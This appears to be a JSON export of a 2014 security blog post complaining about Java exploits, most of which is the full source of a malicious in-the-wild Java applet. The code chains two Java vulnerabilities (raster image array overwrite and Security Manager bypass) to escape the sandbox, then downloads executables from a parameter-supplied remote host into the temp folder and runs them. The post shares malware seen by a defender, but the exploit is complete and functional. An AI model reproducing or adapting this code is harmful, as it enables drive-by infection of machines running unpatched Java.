{"id":695,"date":"2014-01-21T18:43:35","date_gmt":"2014-01-21T18:43:35","guid":{"rendered":"http:\/\/www.gironsec.com\/blog\/?p=695"},"modified":"2014-03-18T00:12:04","modified_gmt":"2014-03-18T00:12:04","slug":"damn-you-sun-oracle-java","status":"publish","type":"post","link":"https:\/\/www.gironsec.com\/blog\/2014\/01\/damn-you-sun-oracle-java\/","title":{"rendered":"Damn you Sun \/ Oracle \/ Java"},"content":{"rendered":"

Howdy all!<\/p>\n

What exploit code do you think I run into on a daily basis? Java! Every day, its the same 2 exploits. I’ve stated this before, but today I’m going to post the code. Most of the time, malware distributors are smarter and obfuscate their exploit code as much as possible as to avoid heuristics and auto detection. Then once in a while some dumbass won’t and our AV’s will pack it up on the spot. This is one of those cases. Can you guess what’s being exploited here?<\/p>\n

<\/p>\n

\n
import<\/span> java.applet.Applet<\/span>;<\/span>\r\nimport<\/span> java.awt.image.BufferedImage<\/span>;<\/span>\r\nimport<\/span> java.awt.image.ByteLookupTable<\/span>;<\/span>\r\nimport<\/span> java.awt.image.DataBufferByte<\/span>;<\/span>\r\nimport<\/span> java.awt.image.Kernel<\/span>;<\/span>\r\nimport<\/span> java.awt.image.LookupOp<\/span>;<\/span>\r\nimport<\/span> java.awt.image.Raster<\/span>;<\/span>\r\nimport<\/span> java.awt.image.WritableRaster<\/span>;<\/span>\r\nimport<\/span> java.beans.Statement<\/span>;<\/span>\r\nimport<\/span> java.io.FileOutputStream<\/span>;<\/span>\r\nimport<\/span> java.io.PrintStream<\/span>;<\/span>\r\nimport<\/span> java.net.URL<\/span>;<\/span>\r\nimport<\/span> java.nio.channels.Channels<\/span>;<\/span>\r\nimport<\/span> java.nio.channels.FileChannel<\/span>;<\/span>\r\nimport<\/span> java.nio.channels.ReadableByteChannel<\/span>;<\/span>\r\nimport<\/span> java.security.AccessControlContext<\/span>;<\/span>\r\nimport<\/span> java.security.AllPermission<\/span>;<\/span>\r\nimport<\/span> java.security.CodeSource<\/span>;<\/span>\r\nimport<\/span> java.security.Permissions<\/span>;<\/span>\r\nimport<\/span> java.security.ProtectionDomain<\/span>;<\/span>\r\nimport<\/span> java.security.cert.Certificate<\/span>;<\/span>\r\nimport<\/span> java.util.Random<\/span>;<\/span>\r\n\r\npublic<\/span> class<\/span> TestByteBI<\/span> extends<\/span> Applet\r\n{<\/span>\r\n  public<\/span> int<\/span> numArrays_ =<\/span> 10<\/span>;<\/span>\r\n  public<\/span> final<\/span> int<\/span> arrayLength =<\/span> 11<\/span>;<\/span>\r\n  public<\/span> int<\/span>[][]<\/span> Arrays_;<\/span>\r\n\r\n  public<\/span> void<\/span> init<\/span>()<\/span>\r\n  {<\/span>\r\n    go();<\/span>\r\n  }<\/span>\r\n\r\n  public<\/span> void<\/span> go<\/span>()<\/span>\r\n  {<\/span>\r\n    try<\/span>\r\n    {<\/span>\r\n      String name =<\/span> "setSecurityManager"<\/span>;<\/span>\r\n      Object[]<\/span> o1 =<\/span> new<\/span> Object[<\/span>1<\/span>];<\/span>\r\n      Object o2 =<\/span> new<\/span> Statement(<\/span>System.<\/span>class<\/span>,<\/span> name,<\/span> o1);<\/span>\r\n\r\n      this<\/span>.<\/span>Arrays_<\/span> =<\/span> new<\/span> int<\/span>[<\/span>this<\/span>.<\/span>numArrays_<\/span>][];<\/span>\r\n\r\n      Kernel kernel =<\/span> new<\/span> Kernel(<\/span>1<\/span>,<\/span> 1<\/span>,<\/span> new<\/span> float<\/span>[]<\/span> {<\/span> 1.0<\/span>F,<\/span> 1.0<\/span>F,<\/span> 1.0<\/span>F,<\/span> 1.0<\/span>F });<\/span>\r\n      byte<\/span>[][]<\/span> data =<\/span> new<\/span> byte<\/span>[<\/span>1<\/span>][<\/span>2000<\/span>];<\/span>\r\n      for<\/span> (<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> data.<\/span>length<\/span>;<\/span> i++)<\/span> {<\/span>\r\n        for<\/span> (<\/span>int<\/span> j =<\/span> 0<\/span>;<\/span> j <<\/span> data[<\/span>i].<\/span>length<\/span>;<\/span> j++)<\/span> {<\/span>\r\n          data[<\/span>i][<\/span>j]<\/span> =<\/span> 65<\/span>;<\/span>\r\n        }<\/span>\r\n      }<\/span>\r\n      ByteLookupTable lookupTable =<\/span> new<\/span> ByteLookupTable(<\/span>0<\/span>,<\/span> data);<\/span>\r\n\r\n      LookupOp op =<\/span> new<\/span> LookupOp(<\/span>lookupTable,<\/span> null<\/span>);<\/span>\r\n\r\n      int<\/span> srcW =<\/span> 20<\/span>;<\/span> int<\/span> srcH =<\/span> 20<\/span>;<\/span>\r\n      int<\/span> dstW =<\/span> 7<\/span>;<\/span> int<\/span> dstH =<\/span> 7<\/span>;<\/span>\r\n\r\n      BufferedImage src =<\/span> new<\/span> TestByteBI.<\/span>MyBufferedImage<\/span>(<\/span>srcW,<\/span> srcH,<\/span> dstW,<\/span> dstH,<\/span> 11<\/span>);<\/span>\r\n\r\n      BufferedImage tmp =<\/span> new<\/span> BufferedImage(<\/span>dstW,<\/span> dstH,<\/span> 10<\/span>);<\/span>\r\n\r\n      DataBufferByte dstBuffer =<\/span> new<\/span> DataBufferByte(<\/span>dstW *<\/span> dstH);<\/span>\r\n\r\n      for<\/span> (<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> this<\/span>.<\/span>numArrays_<\/span>;<\/span> i++)<\/span> {<\/span>\r\n        this<\/span>.<\/span>Arrays_<\/span>[<\/span>i]<\/span> =<\/span> new<\/span> int<\/span>[<\/span>11<\/span>];<\/span>\r\n        for<\/span> (<\/span>int<\/span> j =<\/span> 0<\/span>;<\/span> j <<\/span> 11<\/span>;<\/span> j++)<\/span> {<\/span>\r\n          this<\/span>.<\/span>Arrays_<\/span>[<\/span>i][<\/span>j]<\/span> =<\/span> 1768650105<\/span>;<\/span>\r\n        }<\/span>\r\n      }<\/span>\r\n\r\n      WritableRaster raster =<\/span> Raster.<\/span>createWritableRaster<\/span>(<\/span>tmp.<\/span>getSampleModel<\/span>(),<\/span> dstBuffer,<\/span> null<\/span>);<\/span>\r\n\r\n      BufferedImage dst =<\/span> new<\/span> BufferedImage(<\/span>tmp.<\/span>getColorModel<\/span>(),<\/span> raster,<\/span> false<\/span>,<\/span> null<\/span>);<\/span>\r\n\r\n      Object[]<\/span> oo =<\/span> new<\/span> Object[<\/span>7<\/span>];<\/span>\r\n\r\n      oo[<\/span>2<\/span>]<\/span> =<\/span> new<\/span> Statement(<\/span>System.<\/span>class<\/span>,<\/span> name,<\/span> o1);<\/span>\r\n\r\n      Permissions ps =<\/span> new<\/span> Permissions();<\/span>\r\n      ps.<\/span>add<\/span>(<\/span>new<\/span> AllPermission());<\/span>\r\n\r\n      oo[<\/span>3<\/span>]<\/span> =<\/span> new<\/span> AccessControlContext(<\/span>\r\n        new<\/span> ProtectionDomain[]<\/span> {<\/span> \r\n        new<\/span> ProtectionDomain<\/span>(<\/span>\r\n        new<\/span> CodeSource<\/span>(<\/span>\r\n        new<\/span> URL<\/span>(<\/span>"file:\/\/\/"<\/span>),<\/span> \r\n        new<\/span> Certificate[<\/span>0<\/span>]),<\/span> \r\n        ps)<\/span> });<\/span>\r\n\r\n      oo[<\/span>4<\/span>]<\/span> =<\/span> ((<\/span>Statement)<\/span>oo[<\/span>2<\/span>]).<\/span>getTarget<\/span>();<\/span>\r\n\r\n      op.<\/span>filter<\/span>(<\/span>src,<\/span> dst);<\/span>\r\n\r\n      int<\/span>[]<\/span> a =<\/span> (<\/span>int<\/span>[])<\/span>null<\/span>;<\/span>\r\n\r\n      for<\/span> (<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> this<\/span>.<\/span>numArrays_<\/span>;<\/span> i++)<\/span> {<\/span>\r\n        if<\/span> ((<\/span>this<\/span>.<\/span>Arrays_<\/span>[<\/span>i]<\/span> !=<\/span> null<\/span>)<\/span> &&<\/span> (<\/span>this<\/span>.<\/span>Arrays_<\/span>[<\/span>i].<\/span>length<\/span> ><\/span> 11<\/span>))<\/span> {<\/span>\r\n          a =<\/span> this<\/span>.<\/span>Arrays_<\/span>[<\/span>i];<\/span>\r\n          break<\/span>;<\/span>\r\n        }<\/span>\r\n      }<\/span>\r\n\r\n      if<\/span> (<\/span>a ==<\/span> null<\/span>)<\/span> {<\/span>\r\n        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Failed to overwrite array length!"<\/span>);<\/span>\r\n        return<\/span>;<\/span>\r\n      }<\/span>\r\n\r\n      boolean<\/span> found =<\/span> false<\/span>;<\/span>\r\n      int<\/span> ooLen =<\/span> oo.<\/span>length<\/span>;<\/span>\r\n      for<\/span> (<\/span>int<\/span> i =<\/span> 13<\/span>;<\/span> i <<\/span> a.<\/span>length<\/span>;<\/span> i++)<\/span> {<\/span>\r\n        if<\/span> ((<\/span>a[(<\/span>i -<\/span> 1<\/span>)]<\/span> ==<\/span> ooLen)<\/span> &&<\/span> (<\/span>a[<\/span>i]<\/span> ==<\/span> 0<\/span>)<\/span> &&<\/span> (<\/span>a[(<\/span>i +<\/span> 1<\/span>)]<\/span> ==<\/span> 0<\/span>)<\/span> &&<\/span> \r\n          (<\/span>a[(<\/span>i +<\/span> 2<\/span>)]<\/span> !=<\/span> 0<\/span>)<\/span> &&<\/span> (<\/span>a[(<\/span>i +<\/span> 3<\/span>)]<\/span> !=<\/span> 0<\/span>)<\/span> &&<\/span> (<\/span>a[(<\/span>i +<\/span> 4<\/span>)]<\/span> !=<\/span> 0<\/span>)<\/span> &&<\/span> \r\n          (<\/span>a[(<\/span>i +<\/span> 5<\/span>)]<\/span> ==<\/span> 0<\/span>)<\/span> &&<\/span> (<\/span>a[(<\/span>i +<\/span> 6<\/span>)]<\/span> ==<\/span> 0<\/span>))<\/span>\r\n        {<\/span>\r\n          int<\/span> stmTrg =<\/span> a[(<\/span>i +<\/span> 4<\/span>)];<\/span>\r\n\r\n          for<\/span> (<\/span>int<\/span> j =<\/span> i +<\/span> 7<\/span>;<\/span> j <<\/span> i +<\/span> 7<\/span> +<\/span> 64<\/span>;<\/span> j++)<\/span> {<\/span>\r\n            if<\/span> (<\/span>a[<\/span>j]<\/span> ==<\/span> stmTrg)<\/span>\r\n            {<\/span>\r\n              a[(<\/span>j -<\/span> 1<\/span>)]<\/span> =<\/span> a[(<\/span>i +<\/span> 3<\/span>)];<\/span>\r\n              found =<\/span> true<\/span>;<\/span>\r\n              break<\/span>;<\/span>\r\n            }<\/span>\r\n          }<\/span>\r\n          if<\/span> (<\/span>found)<\/span>\r\n            break<\/span>;<\/span>\r\n        }<\/span>\r\n      }<\/span>\r\n      if<\/span> (<\/span>found)<\/span>\r\n      {<\/span>\r\n        try<\/span>\r\n        {<\/span>\r\n          ((<\/span>Statement)<\/span>oo[<\/span>2<\/span>]).<\/span>execute<\/span>();<\/span>\r\n\r\n          String t =<\/span> "java"<\/span>;<\/span> String m =<\/span> "io"<\/span>;<\/span> String p =<\/span> "tmpdir"<\/span>;<\/span> String dot =<\/span> "."<\/span>;<\/span>\r\n          Random random =<\/span> new<\/span> Random();<\/span>\r\n          String r1 =<\/span> "http:\/\/"<\/span>;<\/span>\r\n          String cookie =<\/span> new<\/span> String();<\/span>\r\n          cookie =<\/span> getParameter(<\/span>"cookie"<\/span>);<\/span>\r\n          String t1 =<\/span> "\/temp\/"<\/span> +<\/span> cookie +<\/span> "\/"<\/span> +<\/span> random.<\/span>nextInt<\/span>()<\/span> +<\/span> "\/"<\/span>;<\/span>\r\n          String e1 =<\/span> "?page="<\/span>;<\/span>\r\n          String param =<\/span> new<\/span> String();<\/span>\r\n          String cmp =<\/span> new<\/span> String();<\/span>\r\n          param =<\/span> getParameter(<\/span>"http"<\/span>);<\/span>\r\n          cmp =<\/span> getParameter(<\/span>"ftp"<\/span>);<\/span>\r\n\r\n          String l =<\/span> System.<\/span>getProperty<\/span>(<\/span>t +<\/span> dot +<\/span> m +<\/span> dot +<\/span> p);<\/span>\r\n\r\n          String r =<\/span> r1 +<\/span> param +<\/span> t1 +<\/span> e1 +<\/span> cmp;<\/span>\r\n          d(<\/span>r,<\/span> l);<\/span>\r\n          d(<\/span>r +<\/span> "02"<\/span>,<\/span> l);<\/span>\r\n          d(<\/span>r +<\/span> "03"<\/span>,<\/span> l);<\/span>\r\n          d(<\/span>r +<\/span> "04"<\/span>,<\/span> l);<\/span>\r\n        }<\/span>\r\n        catch<\/span> (<\/span>Exception ex)<\/span> {<\/span>\r\n          ex.<\/span>printStackTrace<\/span>();<\/span>\r\n        }<\/span>\r\n      }<\/span>\r\n    }<\/span> catch<\/span> (<\/span>Exception ex)<\/span> {<\/span> ex.<\/span>printStackTrace<\/span>();<\/span> }<\/span>\r\n\r\n  }<\/span>\r\n\r\n  private<\/span> void<\/span> d<\/span>(<\/span>String rPath,<\/span> String lPath)<\/span>\r\n  {<\/span>\r\n    Random rand =<\/span> new<\/span> Random();<\/span>\r\n    lPath =<\/span> lPath +<\/span> "\\\\h"<\/span> +<\/span> rand.<\/span>nextInt<\/span>()<\/span> +<\/span> ".tmp."<\/span>;<\/span>\r\n    try<\/span>\r\n    {<\/span>\r\n      String type =<\/span> new<\/span> String();<\/span>\r\n      type =<\/span> getParameter(<\/span>"type"<\/span>);<\/span>\r\n      String fun =<\/span> new<\/span> String();<\/span>\r\n      fun =<\/span> getParameter(<\/span>"fun"<\/span>);<\/span>\r\n      URL url =<\/span> new<\/span> URL(<\/span>rPath);<\/span>\r\n      ReadableByteChannel rbc =<\/span> Channels.<\/span>newChannel<\/span>(<\/span>url.<\/span>openStream<\/span>());<\/span>\r\n      String ext =<\/span> new<\/span> String();<\/span>\r\n\r\n      FileOutputStream fos =<\/span> new<\/span> FileOutputStream(<\/span>lPath +<\/span> "exe"<\/span>);<\/span>\r\n      fos.<\/span>getChannel<\/span>().<\/span>transferFrom<\/span>(<\/span>rbc,<\/span> 0L<\/span>,<\/span> 16777216L<\/span>);<\/span>\r\n      fos.<\/span>close<\/span>();<\/span>\r\n\r\n      Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>lPath +<\/span> "exe"<\/span>);<\/span>\r\n    }<\/span>\r\n    catch<\/span> (<\/span>Exception localException)<\/span>\r\n    {<\/span>\r\n    }<\/span>\r\n  }<\/span>\r\n\r\n  public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span>\r\n  {<\/span>\r\n    new<\/span> TestByteBI<\/span>().<\/span>go<\/span>();<\/span>\r\n  }<\/span>\r\n  public<\/span> static<\/span> class<\/span> MyBufferedImage<\/span> extends<\/span> BufferedImage {<\/span>\r\n    private<\/span> int<\/span> fakeW_;<\/span>\r\n    private<\/span> int<\/span> fakeH_;<\/span>\r\n\r\n    public<\/span> MyBufferedImage<\/span>(<\/span>int<\/span> w,<\/span> int<\/span> h,<\/span> int<\/span> fakeW,<\/span> int<\/span> fakeH,<\/span> int<\/span> type)<\/span> {<\/span>\r\n      super<\/span>(<\/span>h,<\/span> type);<\/span>\r\n\r\n      this<\/span>.<\/span>fakeW_<\/span> =<\/span> fakeW;<\/span>\r\n      this<\/span>.<\/span>fakeH_<\/span> =<\/span> fakeH;<\/span>\r\n    }<\/span>\r\n\r\n    public<\/span> int<\/span> getWidth<\/span>()<\/span> {<\/span>\r\n      return<\/span> this<\/span>.<\/span>fakeW_<\/span>;<\/span>\r\n    }<\/span>\r\n\r\n    public<\/span> int<\/span> getHeight<\/span>()<\/span> {<\/span>\r\n      return<\/span> this<\/span>.<\/span>fakeH_<\/span>;<\/span>\r\n    }<\/span>\r\n  }<\/span>\r\n}<\/span>\r\n<\/pre>\n<\/div>\n
If you guessed the Security Manager exploit, you’re half right. Its two CVE’s in one! The ‘Raster Images’ and ‘Security Manager’ vulnerabilities are constantly being exploited today for 2 reasons: 1) no one updates their java, and 2) java sucks. Its been more than a year and there are still hundreds of millions of vulnerable machines to these 2 vulnerabilities. This means malware delivery is still fresh and strong. <\/p>\n
I feel 2014 is going to suck ass. Thanks Oracle \/ Sun \/ Java.
\nEdited due to censorship<\/p>\n","protected":false},"excerpt":{"rendered":"
Howdy all! What exploit code do you think I run into on a daily basis? Java! Every day, its the same 2 exploits. I’ve stated this before, but today I’m going to post the code. Most of the time, malware distributors are smarter and obfuscate their exploit code as much as possible as to avoid […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[4],"tags":[87],"_links":{"self":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/695"}],"collection":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/comments?post=695"}],"version-history":[{"count":2,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/695\/revisions"}],"predecessor-version":[{"id":762,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/695\/revisions\/762"}],"wp:attachment":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/media?parent=695"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/categories?post=695"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/tags?post=695"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}